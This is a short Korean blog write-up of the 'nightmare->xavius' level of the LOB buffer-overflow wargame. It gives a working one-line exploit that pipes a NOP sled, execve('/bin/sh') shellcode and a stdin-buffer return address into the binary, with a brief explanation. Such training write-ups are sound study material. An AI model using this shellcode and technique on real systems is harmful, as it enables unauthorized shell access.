고졸백수해킹일기

nightmare->xavius 본문

Wargame/lob

nightmare->xavius

ExploitSori 2018. 3. 13. 00:45

(python -c 'print "\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x01\x50\x01\x40"';cat) | ./xavius


다른 문제와 다르게 fgets으로 받는다 그리고 소스를 보면 ret주소에 스택영역의 주소와 libc주소를 사용하지 못한다

따라서 stdin영역을 사용하기로 했다.


nop[19] + shellcode[25] + ret[4] (stdin address)


throw me away

저작자표시 (새창열림)

'Wargame > lob' 카테고리의 다른 글

xavius->death_knight  (0) 2018.03.13
succubus->nightmare  (0) 2018.03.12
zombie_assassin->succubus  (0) 2018.03.11
assassin->zombie_assassin  (0) 2018.03.07
giant->assassin  (0) 2018.03.07
'Wargame/lob' Related Articles more